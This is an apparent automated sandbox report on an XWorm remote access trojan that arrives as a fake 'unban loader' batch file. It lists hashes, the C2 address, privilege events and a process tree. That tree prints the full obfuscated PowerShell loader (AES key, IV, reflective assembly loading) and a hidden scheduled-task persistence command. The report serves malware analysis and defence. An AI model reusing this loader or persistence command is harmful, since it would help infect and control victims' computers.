xworm | c4db1679718dfb67fb33fcedced456035056f41b68fc071379d27d8bd708e6ab

Analysis

max time kernel
9s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
20-01-2025 16:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Luigi Unban Loader.bat
Size

478KB
MD5

09c4764995d1f2e96d0a228743f2425e
SHA1

0a755c43e147141ec0e9d96d243765af66d1e8a0
SHA256

c4db1679718dfb67fb33fcedced456035056f41b68fc071379d27d8bd708e6ab
SHA512

856759d72b6fff895d336acb8f86ac82ad8560f5229c1cd12baf25bf6ea9ee80035d364c69c00e66bbe9678f788a635f837032a92d3f08008a8343dcc992ff6e
SSDEEP

6144:Y5uDX7kLnB9tGFQe+6YRAFcqLw7DT8ZUXtk9clnD:Yo8LB2FQh64AFcqLw7kZ+uInD

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

80.76.49.227:9999

Mutex

g0vzRORqzebeaKQj

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/2232-48-0x00000288AFFB0000-0x00000288AFFBE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3156	powershell.exe
3000	powershell.exe
2232	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3156	powershell.exe
3156	powershell.exe
3000	powershell.exe
3000	powershell.exe
2232	powershell.exe
2232	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3156	powershell.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeIncreaseQuotaPrivilege	3000	powershell.exe
Token: SeSecurityPrivilege	3000	powershell.exe
Token: SeTakeOwnershipPrivilege	3000	powershell.exe
Token: SeLoadDriverPrivilege	3000	powershell.exe
Token: SeSystemProfilePrivilege	3000	powershell.exe
Token: SeSystemtimePrivilege	3000	powershell.exe
Token: SeProfSingleProcessPrivilege	3000	powershell.exe
Token: SeIncBasePriorityPrivilege	3000	powershell.exe
Token: SeCreatePagefilePrivilege	3000	powershell.exe
Token: SeBackupPrivilege	3000	powershell.exe
Token: SeRestorePrivilege	3000	powershell.exe
Token: SeShutdownPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeSystemEnvironmentPrivilege	3000	powershell.exe
Token: SeRemoteShutdownPrivilege	3000	powershell.exe
Token: SeUndockPrivilege	3000	powershell.exe
Token: SeManageVolumePrivilege	3000	powershell.exe
Token: 33	3000	powershell.exe
Token: 34	3000	powershell.exe
Token: 35	3000	powershell.exe
Token: 36	3000	powershell.exe
Token: SeIncreaseQuotaPrivilege	3000	powershell.exe
Token: SeSecurityPrivilege	3000	powershell.exe
Token: SeTakeOwnershipPrivilege	3000	powershell.exe
Token: SeLoadDriverPrivilege	3000	powershell.exe
Token: SeSystemProfilePrivilege	3000	powershell.exe
Token: SeSystemtimePrivilege	3000	powershell.exe
Token: SeProfSingleProcessPrivilege	3000	powershell.exe
Token: SeIncBasePriorityPrivilege	3000	powershell.exe
Token: SeCreatePagefilePrivilege	3000	powershell.exe
Token: SeBackupPrivilege	3000	powershell.exe
Token: SeRestorePrivilege	3000	powershell.exe
Token: SeShutdownPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeSystemEnvironmentPrivilege	3000	powershell.exe
Token: SeRemoteShutdownPrivilege	3000	powershell.exe
Token: SeUndockPrivilege	3000	powershell.exe
Token: SeManageVolumePrivilege	3000	powershell.exe
Token: 33	3000	powershell.exe
Token: 34	3000	powershell.exe
Token: 35	3000	powershell.exe
Token: 36	3000	powershell.exe
Token: SeIncreaseQuotaPrivilege	3000	powershell.exe
Token: SeSecurityPrivilege	3000	powershell.exe
Token: SeTakeOwnershipPrivilege	3000	powershell.exe
Token: SeLoadDriverPrivilege	3000	powershell.exe
Token: SeSystemProfilePrivilege	3000	powershell.exe
Token: SeSystemtimePrivilege	3000	powershell.exe
Token: SeProfSingleProcessPrivilege	3000	powershell.exe
Token: SeIncBasePriorityPrivilege	3000	powershell.exe
Token: SeCreatePagefilePrivilege	3000	powershell.exe
Token: SeBackupPrivilege	3000	powershell.exe
Token: SeRestorePrivilege	3000	powershell.exe
Token: SeShutdownPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeSystemEnvironmentPrivilege	3000	powershell.exe
Token: SeRemoteShutdownPrivilege	3000	powershell.exe
Token: SeUndockPrivilege	3000	powershell.exe
Token: SeManageVolumePrivilege	3000	powershell.exe
Token: 33	3000	powershell.exe
Token: 34	3000	powershell.exe
Token: 35	3000	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 4804 wrote to memory of 3156	4804	cmd.exe	78
PID 4804 wrote to memory of 3156	4804	cmd.exe	78
PID 3156 wrote to memory of 3000	3156	powershell.exe	80
PID 3156 wrote to memory of 3000	3156	powershell.exe	80
PID 3156 wrote to memory of 1824	3156	powershell.exe	82
PID 3156 wrote to memory of 1824	3156	powershell.exe	82
PID 1824 wrote to memory of 2524	1824	WScript.exe	83
PID 1824 wrote to memory of 2524	1824	WScript.exe	83
PID 2524 wrote to memory of 2232	2524	cmd.exe	85
PID 2524 wrote to memory of 2232	2524	cmd.exe	85

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Luigi Unban Loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Local\Temp\Luigi Unban Loader.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3156
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_875_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_875.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3000
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_875.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_875.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2524
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Roaming\startup_str_875.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6ed6547d270ec2a3219183bfa73bc09b

SHA1
efbcbdbdccab903a79b2b0a65d882eca8bb81363

SHA256
f7511aa08a289c57af48cfffb1361623c47df6324b80f94841ba69c9497f9ac2

SHA512
d396cd37f446f9798dcd60229f0c2f55a4bdc0541149dea4be51236e7d91bc65f2bf9eee8327beafc3fe387dded9c3cc049e2101137e73956194e88939a7ec72

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ynpyr5bi.y4s.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_875.bat

Filesize
478KB

MD5
09c4764995d1f2e96d0a228743f2425e

SHA1
0a755c43e147141ec0e9d96d243765af66d1e8a0

SHA256
c4db1679718dfb67fb33fcedced456035056f41b68fc071379d27d8bd708e6ab

SHA512
856759d72b6fff895d336acb8f86ac82ad8560f5229c1cd12baf25bf6ea9ee80035d364c69c00e66bbe9678f788a635f837032a92d3f08008a8343dcc992ff6e

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_875.vbs

Filesize
115B

MD5
75b80c02acfc598e4dcac01384a02ee0

SHA1
ad8aa560c179f6c22979fafdf02a3c6828da2651

SHA256
cb39ff5c034b94764f80996fcad4ab389d9209ae5025dcdac2c41b3426b10585

SHA512
f70e77e96e0c8e4f48643df580f6386a7dc08d9448dc5d474579c9eb2987e788ca1f872c9aa7ab303ccc9a2c9df770e68b380312dcf8b7b2f729df8fb013b81e

Download Submit
memory/2232-48-0x00000288AFFB0000-0x00000288AFFBE000-memory.dmp

Filesize
56KB

Download
memory/3000-30-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/3000-24-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/3000-25-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/3000-26-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/3000-27-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/3156-14-0x0000022C986E0000-0x0000022C98712000-memory.dmp

Filesize
200KB

Download
memory/3156-0-0x00007FFCAE873000-0x00007FFCAE875000-memory.dmp

Filesize
8KB

Download
memory/3156-13-0x0000022C983A0000-0x0000022C983A8000-memory.dmp

Filesize
32KB

Download
memory/3156-12-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/3156-11-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/3156-10-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/3156-9-0x0000022CFD8E0000-0x0000022CFD902000-memory.dmp

Filesize
136KB

Download
memory/3156-49-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download